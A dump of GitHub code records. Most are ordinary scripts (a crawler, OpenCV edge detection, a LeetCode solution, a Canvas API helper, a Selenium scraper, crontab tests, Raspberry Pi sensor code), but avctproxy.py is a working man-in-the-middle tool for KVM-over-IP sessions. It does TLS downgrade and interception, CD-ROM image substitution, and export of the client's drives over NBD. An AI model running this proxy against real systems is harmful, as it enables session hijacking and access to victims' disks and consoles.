soup.select('ul.type06 li') :\r\n news.append({\r\n 'title':news_data.select('a')[-1].text.strip(),\r\n 'body':news_data.select_one('span.lede').text.strip()\r\n })\r\n \r\n page += 1\r\n \r\n \r\n\r\n s3.Bucket('zoomstudy').put_object(Key = f'news/{date_str}.json',Body = json.dumps(news, ensure_ascii= False))\r\n \r\n date = date - datetime.timedelta(days=1)","repo_name":"zoom236/Web_Crawling","sub_path":"[Review]15_S3Crawling.py","file_name":"[Review]15_S3Crawling.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9293306399","text":"#!/usr/bin/python\n\nfrom twisted.internet import protocol, ssl, reactor, endpoints, defer\nfrom twisted.python import log\nfrom OpenSSL import SSL\nfrom zope.interface import implements\n\nimport os\n\nfrom utils import hexdump, RODict\nfrom avctproto import AvctProtocol\nimport avctpacket\nimport nbdserver\n\n\nclass AvctProxy(AvctProtocol):\n\t\"\"\"A base class for proxying APCP/AVMP messages\"\"\"\n\n\t# OVERRIDE interceptMessages, don't modify!\n\tinterceptMessages = RODict()\n\n\tready = False\n\n\tdef messageReceived(self, packet):\n\t\thandler = self.interceptMessages.get(\n\t\t\t(packet.proto, packet.messageType),\n\t\t\tdebugProxy\n\t\t)\n\t\thandler(self, packet)\n\n\tdef connectionLost(self, reason):\n\t\tlog.msg(\"%s: connection lost (%s). Disconnecting peer.\" % (\n\t\t\tself.logPrefix(), str(reason)\n\t\t))\n\t\tif self.peer.transport is not None:\n\t\t\tself.peer.transport.loseConnection()\n\t\t# Clear possible circular refs\n\t\tself.peer = None\n\t\tself.factory = None\n\n\tdef logPrefix(self):\n\t\tif isinstance(self.factory, AvctProxyServerFactory):\n\t\t\treturn \"AVCTProxyServer\"\n\t\telif isinstance(self.factory, AvctProxyClientFactory):\n\t\t\treturn \"AVCTProxyClient\"\n\t\telse:\n\t\t\treturn \"AvctProxyUnknownRole\"\n\n\tdef passthroughData(self, data):\n\t\tlog.msg(\"[passthrough]:\\n\" + hexdump(data))\n\t\tself.peer.transport.write(data)\n\n\ndef silentProxy(p, packet):\n\tp.peer.sendMessage(packet)\n\n\ndef debugProxy(p, packet):\n\tif packet.proto in ('APCP', 'AVMP'):\n\t\tlog.msg(\"Proxying \" + packet.display())\n\tp.peer.sendMessage(packet)\n\n\nclass AvctProxyServerFactory(protocol.Factory):\n\tprotocol = AvctProxy\n\n\tdef __init__(self, clientFactory, clientEndpoint, sessionJacker, driveJacker):\n\t\tself.clientFactory = clientFactory\n\t\tself.clientEndpoint = clientEndpoint\n\t\tself.sessionJacker = sessionJacker\n\t\tself.driveJacker = driveJacker\n\t\tself.sessionNumber = 0\n\n\tdef buildProtocol(self, addr):\n\t\tp = self.protocol()\n\t\tp.factory = self\n\t\tp.sessionNumber = self.sessionNumber\n\t\tself.sessionNumber += 1\n\t\td = self.clientEndpoint.connect(self.clientFactory)\n\t\td.addCallback(self.clientConnected, p)\n\t\td.addErrback(self.clientConnectFailed, p)\n\t\treturn p\n\n\tdef clientConnected(self, clientp, p):\n\t\tlog.msg(\"Connected to KVM server\")\n\t\tp.peer = clientp\n\t\tclientp.peer = p\n\t\tp.ready = True\n\t\tclientp.ready = True\n\t\tclientp.sessionNumber = p.sessionNumber\n\n\t\tp.interceptMessages = {\n\t\t\t(\"AVMP\", 0x0210): self.driveJacker.mapCD,\n\t\t\t(\"AVMP\", 0x0211): self.driveJacker.mapDisk,\n\t\t\t(\"AVMP\", 0x0220): self.driveJacker.unmapDrive,\n\t\t\t(\"AVMP\", 0x0300): self.driveJacker.readResponse,\n\t\t\t(\"AVMP\", 0x0400): silentProxy,\n\t\t\t(\"AVMP\", 0x0410): self.driveJacker.clientStatus,\n\t\t}\n\n\t\tclientp.interceptMessages = {\n\t\t\t(\"APCP\", 0x8100): self.sessionJacker.sessionSetup,\n\t\t\t(\"AVMP\", 0x8200): self.driveJacker.diskInfo,\n\t\t\t(\"AVMP\", 0x8300): self.driveJacker.readRequest,\n\t\t}\n\n\t\t# Flush the buffer\n\t\tp.dataReceived('')\n\t\tclientp.dataReceived('')\n\n\tdef clientConnectFailed(self, reason, p):\n\t\tlog.err(reason)\n\t\tp.transport.loseConnection()\n\n\nclass AvctProxyClientFactory(protocol.Factory):\n\tprotocol = AvctProxy\n\n\nclass ClientCtxFactory(ssl.ClientContextFactory):\n\tmethod = SSL.TLSv1_METHOD\n\n\tdef __init__(self, trustedCerts):\n\t\tself.trustedCerts = trustedCerts\n\n\tdef getContext(self):\n\t\tctx = ssl.ClientContextFactory.getContext(self)\n\t\tif self.trustedCerts is not None:\n\t\t\tctx.load_verify_locations(self.trustedCerts)\n\t\treturn ctx\n\n\ndef ServerCtxFactory(serverkey, servercert):\n\tif serverkey is None and servercert is None:\n\t\tlog.msg(\"Server key and/or server cert not supplied. TLS MiTM disabled\")\n\t\treturn None\n\treturn ssl.DefaultOpenSSLContextFactory(\n\t\tserverkey, servercert,\n\t\tsslmethod=SSL.TLSv1_METHOD)\n\n\nclass SessionJacker(object):\n\tdef __init__(self, trustedcerts, serverkey, servercert, attemptDowngrade):\n\t\tself.clientCtxFactory = ClientCtxFactory(trustedcerts)\n\t\tself.serverCtxFactory = ServerCtxFactory(serverkey, servercert)\n\t\tself.attemptDowngrade = attemptDowngrade\n\n\tdef sessionSetup(self, p, packet):\n\t\tlog.msg(\"Received \" + packet.display())\n\t\tif packet.capabilities == 4: # 4 == TLS\n\t\t\tif self.attemptDowngrade:\n\t\t\t\tlog.msg(\"TLS Client downgrade initiated\")\n\t\t\t\tp.transport.startTLS(self.clientCtxFactory)\n\t\t\t\tpacket.capabilities = 1\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\telif self.serverCtxFactory is not None:\n\t\t\t\tlog.msg(\"TLS MiTM initiated\")\n\t\t\t\tp.transport.startTLS(self.clientCtxFactory)\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\t\tp.peer.transport.startTLS(self.serverCtxFactory)\n\t\t\telse:\n\t\t\t\tlog.msg(\"TLS passthrough initiated\")\n\t\t\t\tp.peer.sendMessage(packet)\n\t\t\t\tp.enterPassthrough()\n\t\t\t\tp.peer.enterPassthrough()\n\t\telse:\n\t\t\tlog.msg(\"Cleartext session in progress\")\n\t\t\tp.peer.sendMessage(packet)\n\n\ndef _nbdReady(_):\n\tlog.msg(\"NBD Server ready for connections\")\n\n\ndef _nbdListenFailed(reason):\n\tlog.err(reason)\n\n\ndef nbdexportname(p, driveIndex):\n\treturn \"S%dD%d\" % (p.sessionNumber, driveIndex)\n\n\nclass DriveJacker(object):\n\tdef __init__(self, cdromfp, doNbd, nbdEndpoint):\n\t\tself.cdromfp = cdromfp\n\t\tself.cdromIndices = set()\n\t\tself.nbdExports = {}\n\t\tself.doNbd = doNbd\n\t\tself.cachedDiskInfo = None\n\n\t\tif doNbd:\n\t\t\tf = nbdserver.NBDServerFactory(self.nbdExports)\n\t\t\td = nbdEndpoint.listen(f)\n\t\t\td.addCallback(_nbdReady)\n\t\t\td.addErrback(_nbdListenFailed)\n\n\t# CDROM Jacking\n\tdef mapCD(self, p, packet):\n\t\tif self.cdromfp is None:\n\t\t\tlog.msg(\"CD Jack disabled, proxying \" + packet.display())\n\t\telse:\n\t\t\tlog.msg(\"Original request: \" + packet.display())\n\t\t\ts = os.fstat(self.cdromfp.fileno())\n\t\t\tpacket.numblocks = s.st_size // 2048\n\t\t\tpacket.blocksize = 2048\n\t\t\tlog.msg(\"Modified request: \" + packet.display())\n\t\t\tself.cdromIndices.add(packet.driveIndex)\n\t\t\tlog.msg(\"Jacked CD mapping\")\n\t\tp.peer.sendMessage(packet)\n\n\tdef unmapDrive(self, p, packet):\n\t\texportname = nbdexportname(p, packet.driveIndex)\n\t\tif packet.driveIndex in self.cdromIndices:\n\t\t\tlog.msg(\"Unjacked drive\")\n\t\t\tself.cdromIndices.remove(packet.driveIndex)\n\t\t\tp.peer.sendMessage(packet)\n\t\telif exportname in self.nbdExports:\n\t\t\tself.nbdExports[exportname].size = 0\n\t\t\tdel self.nbdExports[exportname]\n\t\t\tif self.cachedDiskInfo is not None:\n\t\t\t\tself.cachedDiskInfo.items[packet.driveIndex].status = 0\n\t\t\t\tlog.msg(\"Sending cached \" + self.cachedDiskInfo.display())\n\t\t\t\tp.sendMessage(self.cachedDiskInfo)\n\t\t\tstatus = avctpacket.ClientStatus(packet.driveIndex, 0)\n\t\t\tlog.msg(\"Sending our own \" + status.display())\n\t\t\tp.sendMessage(status)\n\t\telse:\n\t\t\tdebugProxy(p, packet)\n\n\tdef readRequest(self, p, packet):\n\t\tlog.msg(\"Received \" + packet.display())\n\n\t\tif packet.driveIndex not in self.cdromIndices:\n\t\t\tp.peer.sendMessage(packet)\n\t\t\treturn\n\n\t\toffset = packet.firstBlock\n\t\tnumBlocks = packet.numBlocks\n\t\twhile numBlocks > 0:\n\t\t\ti = min(numBlocks, packet.blockFactor)\n\t\t\tself.cdromfp.seek(offset * 2048)\n\t\t\tdata = self.cdromfp.read(i * 2048)\n\t\t\tresponse = avctpacket.ReadResponse(\n\t\t\t\tpacket.driveIndex,\n\t\t\t\toffset, i, data\n\t\t\t)\n\t\t\tlog.msg(\"Sending our own \" + response.display())\n\t\t\tp.sendMessage(response)\n\t\t\toffset += i\n\t\t\tnumBlocks -= i\n\t\tstatus = avctpacket.ClientStatus(packet.driveIndex, 0)\n\t\tlog.msg(\"Sending our own \" + status.display())\n\t\tp.sendMessage(status)\n\n\n\t# USB/Floppy Jacking\n\tdef mapDisk(self, p, packet):\n\t\tif not self.doNbd:\n\t\t\treturn debugProxy(p, packet)\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tself.nbdExports[exportName] = NBDExport(p, packet)\n\t\tlog.msg(\"Exported drive as \" + exportName)\n\n\t\tif self.cachedDiskInfo is not None:\n\t\t\tself.cachedDiskInfo.items[packet.driveIndex].status = 1\n\t\t\tlog.msg(\"Sending cached \" + self.cachedDiskInfo.display())\n\t\t\tp.sendMessage(self.cachedDiskInfo)\n\n\t\tstatus = avctpacket.DeviceStatus(packet.driveIndex, 0)\n\t\tlog.msg(\"Sending \" + status.display())\n\t\tp.sendMessage(status)\n\n\tdef readResponse(self, p, packet):\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tif exportName not in self.nbdExports:\n\t\t\treturn debugProxy(p, packet)\n\t\tself.nbdExports[exportName].processReadResponse(packet)\n\n\tdef clientStatus(self, p, packet):\n\t\texportName = nbdexportname(p, packet.driveIndex)\n\t\tif exportName not in self.nbdExports:\n\t\t\treturn debugProxy(p, packet)\n\t\tself.nbdExports[exportName].processClientStatus(packet)\n\n\tdef diskInfo(self, p, packet):\n\t\tfor i in range(len(packet.items)):\n\t\t\texportName = nbdexportname(p, i)\n\t\t\tif exportName in self.nbdExports:\n\t\t\t\tpacket.items[i].status = 1\n\t\tself.cachedDiskInfo = packet\n\t\tdebugProxy(p, packet)\n\n\nclass NBDExport(object):\n\timplements(nbdserver.IBlockDevice)\n\n\tdef __init__(self, proto, packet):\n\t\tself.proto = proto\n\t\tself.driveIndex = packet.driveIndex\n\t\tself.blocksize = packet.blocksize\n\t\tself.size = self.blocksize * packet.numblocks\n\t\tself.flags = 1\n\t\tif packet.readonly:\n\t\t\tself.flags |= 2\n\n\t\tself.requestQueue = [] # AVMP is synchronous only.\n\t\tself.request = None\n\t\tself.defer = None\n\t\tself.readbuf = ''\n\n\tdef processQueue(self):\n\t\tif self.request is not None or len(self.requestQueue) == 0:\n\t\t\treturn\n\t\t(self.request, self.defer) = self.requestQueue.pop(0)\n\t\tself.proto.sendMessage(self.request)\n\n\tdef read(self, offset, length):\n\t\tif offset % self.blocksize != 0:\n\t\t\traise IOError(\"Requests must be block-aligned\")\n\t\tif length % self.blocksize != 0:\n\t\t\traise IOError(\"Requests must be block-sized\")\n\t\tif offset + length > self.size:\n\t\t\traise IOError(\"Attempt to read beyond end of device\")\n\n\t\tpacket = avctpacket.ReadRequest(\n\t\t\tself.driveIndex,\n\t\t\toffset // self.blocksize,\n\t\t\tlength // self.blocksize,\n\t\t\t16384 // self.blocksize\n\t\t)\n\t\td = defer.Deferred()\n\t\tself.requestQueue.append((packet, d))\n\t\tself.processQueue()\n\t\treturn d\n\n\tdef write(self, offset, data):\n\t\tif offset % self.blocksize != 0:\n\t\t\traise ValueError(\"Requests must be block-aligned\")\n\t\tif len(data) % self.blocksize != 0:\n\t\t\traise ValueError(\"Requests must be block-sized\")\n\t\tpacket = avctpacket.WriteRequest(\n\t\t\tself.driveIndex,\n\t\t\toffset // self.blocksize,\n\t\t\tlen(data) // self.blocksize,\n\t\t\tdata\n\t\t)\n\t\td = defer.Deferred()\n\t\tself.requestQueue.append((packet, d))\n\t\tself.processQueue()\n\t\treturn d\n\n\tdef processReadResponse(self, packet):\n\t\tself.readbuf += packet.data\n\n\tdef processClientStatus(self, packet):\n\t\tif self.defer is None:\n\t\t\traise ValueError(\"Received unsolicied \" + packet.display())\n\n\t\tif isinstance(self.request, avctpacket.ReadRequest):\n\t\t\tself.defer.callback(self.readbuf)\n\t\t\tself.readbuf = ''\n\t\telse:\n\t\t\tself.defer.callback(None)\n\t\tself.request = None\n\t\tself.defer = None\n\t\tself.processQueue()\n\n\ndef main():\n\timport sys\n\timport argparse\n\n\tdef serverType(x):\n\t\tif isinstance(x, str):\n\t\t\treturn endpoints.serverFromString(reactor, x)\n\t\telse:\n\t\t\treturn x\n\n\tdef clientType(x):\n\t\tif isinstance(x, str):\n\t\t\treturn endpoints.clientFromString(reactor, x)\n\t\telse:\n\t\t\treturn x\n\n\tdef serverListening(listeningPort):\n\t\tlog.msg(\"AvctProxy listenining on \" + str(listeningPort.getHost()))\n\n\tdef serverListenFailed(reason):\n\t\tif hasattr(reason, 'socketError'):\n\t\t\tlog.err(reason.socketError)\n\t\telse:\n\t\t\tlog.err(reason)\n\t\treactor.stop()\n\n\tparser = argparse.ArgumentParser(description='APCP/AVMP MITM tool')\n\tparser.add_argument(\n\t\t'--listen', help='Listen address/port in Twisted enpoint syntax',\n\t\ttype=serverType, default='tcp:2068')\n\tparser.add_argument(\n\t\t'--target', help='Address of target server (Twisted enpoint syntax)',\n\t\ttype=clientType, required=True)\n\tparser.add_argument(\n\t\t'--trustedcerts',\n\t\thelp='File with trusted TLS certificate(s) - to prevent MiTM of us',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--servercert', help='File containing the server certificate for MiTM',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--serverkey', help='File containing the server private key for MiTM',\n\t\tdefault=None)\n\tparser.add_argument(\n\t\t'--downgrade', help='Attempt to downgrade client connections to cleartext',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--debug', help='Print verbose logs to stderr',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--nbd', help='Export disks and floppys as an NBD device',\n\t\taction='store_true')\n\tparser.add_argument(\n\t\t'--nbdlisten', type=serverType, default='tcp:10809:interface=127.0.0.1',\n\t\thelp='Listen address/port for NBD in Twisted endpoint syntax')\n\tparser.add_argument(\n\t\t'--cdrom', help='Replace any mapped cdrom with the provided file',\n\t\ttype=argparse.FileType(mode='rb'), default=None)\n\targs = parser.parse_args()\n\n\tif args.debug:\n\t\tlog.startLogging(sys.stderr)\n\n\tsessionJacker = SessionJacker(\n\t\targs.trustedcerts, args.serverkey,\n\t\targs.servercert, args.downgrade)\n\n\tdriveJacker = DriveJacker(args.cdrom, args.nbd, args.nbdlisten)\n\n\tclientFactory = AvctProxyClientFactory()\n\tserverFactory = AvctProxyServerFactory(\n\t\tclientFactory, args.target, sessionJacker, driveJacker\n\t)\n\n\td = args.listen.listen(serverFactory)\n\td.addCallback(serverListening)\n\td.addErrback(serverListenFailed)\n\n\treactor.run()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"therealmik/avctproxy","sub_path":"avctproxy.py","file_name":"avctproxy.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16883477644","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef get_max_area_contour(contour_list):\n \"\"\"\n Given a list of contours finds the contour with the maximum area and\n returns\n \"\"\"\n contour_areas = np.array([cv2.contourArea(c) for c in contour_list])\n max_area = contour_areas.max()\n max_ind = contour_areas.argmax()\n max_contour = contour_list[max_ind]\n return max_contour, max_area\n\ndef order_by_area(contour_list):\n \"\"\"\n Given a list of contours finds the contour with the maximum area and\n returns\n \"\"\"\n contour_areas = np.array([cv2.contourArea(c) for c in contour_list])\n indices = list(reversed(np.argsort(contour_areas)))\n reordered_list = [contour_list[index] for index in indices]\n return reordered_list\n\nfps = 30.\ntime_per_frame = int(np.ceil(1000./fps))\n\ndef show_image(img,size=800):\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('image', size, size)\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef show_frame(img,size=800,time_per_frame=time_per_frame):\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('image', size,size)\n cv2.imshow('image',img)\n cv2.waitKey(time_per_frame)\n cv2.destroyAllWindows()\n\nthreshold = 70\n\nvidcap = cv2.VideoCapture('NPF_2.avi')\nsuccess,image = vidcap.read()\n\n# plt.ion()\n# plt.figure()\nshow_frame(image)\n\n# while success:\n# success,image = vidcap.read()\n# show_image(image)\n\nwhile success:\n success,image = vidcap.read()\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # rval, threshold_image = cv2.threshold(image, threshold, np.iinfo(image.dtype).max, cv2.THRESH_BINARY_INV)\n threshold_image = cv2.adaptiveThreshold(image, np.iinfo(image.dtype).max,\\\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,251,2)\n contour_list, _ = cv2.findContours(threshold_image, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)\n max_contour, max_area = get_max_area_contour(contour_list)\n contour_list = order_by_area(contour_list)\n contour_image = cv2.cvtColor(image,cv2.COLOR_GRAY2BGR)\n cv2.drawContours(contour_image,contour_list[0],-1,(0,0,255),2)\n # cv2.drawContours(contour_image,contour_list[1:3],-1,(0,0,255),2)\n # display = contour_image\n # plt.draw()\n show_image(contour_image)\n","repo_name":"annierak/PER_mv","sub_path":"edge_detect_video.py","file_name":"edge_detect_video.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72057811752","text":"\"\"\"有效的字母异位词\"\"\"\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n d1, d2 = {}, {}\n for i in s:\n d1[i] = d1.get(i, 0) + 1\n for i in t:\n d2[i] = d2.get(i, 0) + 1\n return d1 == d2\n\n\nif __name__ == \"__main__\":\n s = Solution()\n res = s.isAnagram(\"rat\", \"car\")\n print(res)\n","repo_name":"BrightHao/arithmetic","sub_path":"leetcode/242/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37409761971","text":"import requests\nimport time\nfrom datetime import datetime\nimport pytz\n\n#auth2 workflow\n#GET https:///login/oauth2/auth?client_id=XXX&response_type=code&redirect_uri=https://example.com/oauth_complete&state=YYY&scope=%20%20\n# request = requests.get(\"https://canvas.ucsc.edu/login/oauth2/auth?client_id=%s&response_type=code&redirect_uri=https://canvas.ucsc.edu\", os.getenv('CLIENT_ID'))\n# print(request.json())\n\n#curl -H \"Authorization: Bearer \" \"https://canvas.instructure.com/api/v1/courses\"\n\nclass Canvas:\n def __init__(self, access_token):\n self.access_token = access_token\n self.base_url = \"https://canvas.instructure.com/api/v1/\"\n self.headers = {\n \"Authorization\": \"Bearer \" + self.access_token,\n \"Content-Type\": \"application/json\"\n }\n def get_courses(self):\n url = self.base_url + \"courses\"\n response = requests.get(url, headers=self.headers)\n return response.json()\n\n def get_assignments(self):\n return_string = \"\"\n courses = self.get_courses()\n for course in courses:\n url = self.base_url + \"courses/\" + str(course[\"id\"]) + \"/assignments\"\n assignments = requests.get(url, headers=self.headers).json()\n return_string = return_string + \"Course: \" + course[\"name\"] + \"\\n\"\n for assignment in assignments:\n if assignment[\"due_at\"] != None:\n assignment_due_date = datetime.strptime(assignment[\"due_at\"], \"%Y-%m-%dT%H:%M:%SZ\")\n if assignment_due_date.date() > datetime.now().date():\n pst = pytz.timezone(\"US/Pacific\")\n date_time = pytz.timezone('UTC').localize(assignment_due_date)\n date_time = date_time.astimezone(pst)\n date_time = date_time.strftime(\"%m/%d/%Y %H:%M\")\n result = \"Assignment: %s\\nDue: %s\" %(assignment[\"name\"], date_time)\n return_string = return_string + result\n return return_string\n\n","repo_name":"benjichen16/Canvas_Discord_Bot","sub_path":"canvas_api.py","file_name":"canvas_api.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73456191593","text":"import os\nimport logging\nimport articales.constants as const\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.INFO)\n\n\nclass Articles(webdriver.Chrome):\n\n def __init__(self, driver_path=r\"./chromedriver\"):\n self.driver_path = driver_path\n os.environ['PATH'] += self.driver_path\n super(Articles, self).__init__()\n self.implicitly_wait(15)\n self.maximize_window()\n self.save_dir = const.SAVE_DIR_BBC_ARTOCALES\n self.article_link_list = []\n\n if not os.path.isdir(rf'../{self.save_dir}'):\n os.makedirs(rf'../{self.save_dir}')\n\n def __exit__(self, exc_type, exc_value, trace):\n self.quit()\n\n def land_first_page(self):\n self.get(const.BASE_URL)\n\n def get_all_articales_link(self):\n try:\n articles_link_list = WebDriverWait(self, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//*[starts-with(@class, 'media__link')]\"))\n )\n except:\n raise\n\n for item in articles_link_list:\n self.article_link_list.append(str(item.get_attribute('href')))\n\n def extract_articles_and_save(self):\n if self.article_link_list:\n total_article_num = len(self.article_link_list)\n for index, link in enumerate(self.article_link_list):\n self.get(link)\n try:\n article_title = self.find_element(By.ID, 'main-heading').get_attribute('innerHTML').strip()\n except:\n article_title = \"\"\n\n if link.startswith(const.BASE_URL):\n filename = str(link).split(const.BASE_URL)[1].replace('/', '_')\n else:\n filename = str(link).split('/')[-1]\n\n if not os.path.isfile(rf\"../{self.save_dir}/{filename}.txt\"):\n text = WebDriverWait(self, 20).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'p'))\n )\n content = \" \".join([i.text for i in text])\n logging.info(f\"--> saving --> {index+1}/{total_article_num}\")\n with open(rf\"../{self.save_dir}/{filename}.txt\", \"w\") as outfile:\n outfile.write(f\"link: {link}\\n title: {article_title}\\n{content}\")\n else:\n continue\n\n","repo_name":"Avichai96/SeleniumExample","sub_path":"articales/articales.py","file_name":"articales.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8374679471","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport gevent\n\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\n\nimport pytest\n\nfrom prewikka.crontab import CronJob, crontab\n\n\ndef cronjob_test_func():\n \"\"\"\n Function for tests only.\n \"\"\"\n return 42\n\n\ndef cronjob_test_func_exception():\n \"\"\"\n Function for tests only.\n \"\"\"\n raise Exception\n\n\ndef test_crontab():\n \"\"\"\n Test `prewikka.crontab.Crontab` class.\n \"\"\"\n cron_name = 'test_name'\n cron_schedule = '*/1 * * * *'\n\n # list()\n crontab_count = len(list(crontab.list()))\n\n assert crontab_count == 3\n\n # add()\n crontab.add(cron_name, cron_schedule, user=env.request.user, ext_type=None, ext_id=None, enabled=True)\n\n assert len(list(crontab.list())) == crontab_count + 1\n\n test_crontab = next(crontab.list())\n\n # get()\n assert crontab.get(test_crontab.id).id == test_crontab.id\n\n # update()\n crontab.update(test_crontab.id, schedule='*/2 * * * *')\n\n assert len(list(crontab.list())) == crontab_count + 1\n assert crontab.get(test_crontab.id).id == test_crontab.id\n assert crontab.get(test_crontab.id).schedule == '*/2 * * * *'\n\n assert len(list(crontab.list())) == crontab_count + 1\n\n # delete()\n assert len(list(crontab.list())) == crontab_count + 1\n\n crontab.delete(**{'id': test_crontab.id})\n\n assert len(list(crontab.list())) == crontab_count\n\n crontab.delete(**{'id': test_crontab.id})\n\n assert len(list(crontab.list())) == crontab_count\n\n crontab.add(cron_name+'2', cron_schedule, user=env.request.user, ext_type='foo')\n crontab.add(cron_name+'3', cron_schedule, user=env.request.user, ext_type='foo', ext_id=1)\n crontab.add(cron_name+'4', cron_schedule, user=env.request.user, enabled=False)\n\n # clean\n env.db.query('DELETE FROM Prewikka_Crontab')\n\n\ndef test_cronjob():\n \"\"\"\n Test `prewikka.crontab.CronJob` class.\n \"\"\"\n now = datetime.now(timezone(\"UTC\"))\n\n cron_name = 'test_name'\n cron_schedule = '* * * * *'\n cron_base = now.replace(second=0, microsecond=0)\n cron_runcnt = 0\n\n # create a crontab for tests\n cron_id = crontab.add(cron_name, cron_schedule, user=env.request.user, ext_type=None, ext_id=None, enabled=True)\n\n cronjob = CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func,\n cron_base - timedelta(minutes=33),\n cron_runcnt,\n user=env.request.user)\n\n # replace() needed for croniter < 0.3.8\n assert now - timedelta(minutes=1) < cronjob.next_schedule.replace(microsecond=0) < now\n\n cronjob = CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func,\n cron_base,\n cron_runcnt,\n user=env.request.user)\n\n # replace() needed for croniter < 0.3.8\n assert now < cronjob.next_schedule.replace(microsecond=0) < now + timedelta(minutes=1)\n\n # run()\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n assert len(query) == 1\n\n runcnt = int(query[0][1])\n cronjob.run(now + timedelta(minutes=1))\n gevent.sleep(1)\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n assert len(query) == 1\n assert int(query[0][1]) == runcnt+1\n\n cronjob.run(now + timedelta(minutes=1))\n gevent.sleep(1)\n query = env.db.query(\"SELECT id, runcnt FROM Prewikka_Crontab WHERE id=%d\", cron_id)\n\n assert len(query) == 1\n assert int(query[0][1]) == runcnt+1\n\n with pytest.raises(Exception):\n CronJob(cron_id,\n cron_name,\n cron_schedule,\n cronjob_test_func_exception(),\n cron_base,\n cron_runcnt,\n user=env.request.user)\n\n # clean\n env.db.query('DELETE FROM Prewikka_Crontab')\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"tests/tests_crontab/test_crontab.py","file_name":"test_crontab.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"21525508426","text":"import vlc\nimport time\nimport smbus\nimport GUI2\nimport serial #通信\n\n#通信的初始化\nuart2 = serial.Serial(port = \"/dev/ttyAMA1\", baudrate = 115200)\nuart2.flushInput()\n\nbus = smbus.SMBus(1) ## 开启总线\naddress = 0x48 ## address ---> 器件的地址(硬件地址 由器件决定)\nA0 = 0x40 ## A0 ----> 器件某个端口的地址(数据存储的寄存器)\nA1 = 0x41\nA2 = 0x42\nA3 = 0x43\n\n\ncheck = 0\n#光敏电阻:0=没有检测到瓶子 1:有瓶子有标签 2:有瓶子没有标签\n#红外对射:3:有东西经过\n\n#0为程序停止,1为程序开始\nsta = 0\nNun = 0\n\n\ndef readOnce():\n while True:\n count = uart2.inWaiting()\n if count != 0:\n recv = uart2.read(count) \n print(\"Recv some data is : \")\n print(recv)\n uart2.flushInput()\n break\n\ndef loop1():#光敏电阻的循环\n global check\n global sta\n global Num\n part = 0#现输入值所在范围\n Time = 0#重复次数\n T=7#目标次数\n starttime = time.time()\n while True:\n bus.write_byte(address,A0) ## 告诉树莓派 你想获取那个器件的那个端口的数据\n value0 =bus.read_byte(address) ## 获得数据\n print(value0)\n print(sta)\n\n time.sleep(0.5)\n if(value0 <= 100 and sta == 1):#没有瓶子\n# print(\"in\")\n check = 0\n Time=0\n part=0\n if(time.time()-starttime >= 40):\n break\n elif(value0 <= 100 and sta == 0):\n# print(\"in\")\n if(part == 0):\n Time = Time + 1\n else:\n Time=1\n part=0\n if(Time == T-2):\n check = 0\n Time=0\n part=0\n print(check)\n break\n \n elif(value0 > 125):#有瓶子有标签\n if(part == 1):\n Time = Time + 1\n else:\n Time=1\n part=1\n if(Time == T):\n check = 1\n Time=0\n part=0\n print(check)\n break\n\n elif(value0>100 and value0 <= 125):#有瓶子没标签\n if(part == 2):\n Time = Time + 1\n else:\n Time=1\n part=2\n if(Time == T):\n check = 2\n Time=0\n part=0\n# print(\"有瓶子没有标签\")\n break\n# print(value1)\n#0:没有检测到瓶子(<=90)\n#1:有瓶子有标签(=>160)\n#2:有瓶子没有标签(100= 10):#一段时间检测不到东西\n check = 4\n break\n \n bus.write_byte(address,A1)\n print(bus.read_byte(address))\n if(X == bus.read_byte(address)):#和第一次的X为同一个数值就time++\n time1 = time1 + 1\n elif(X != 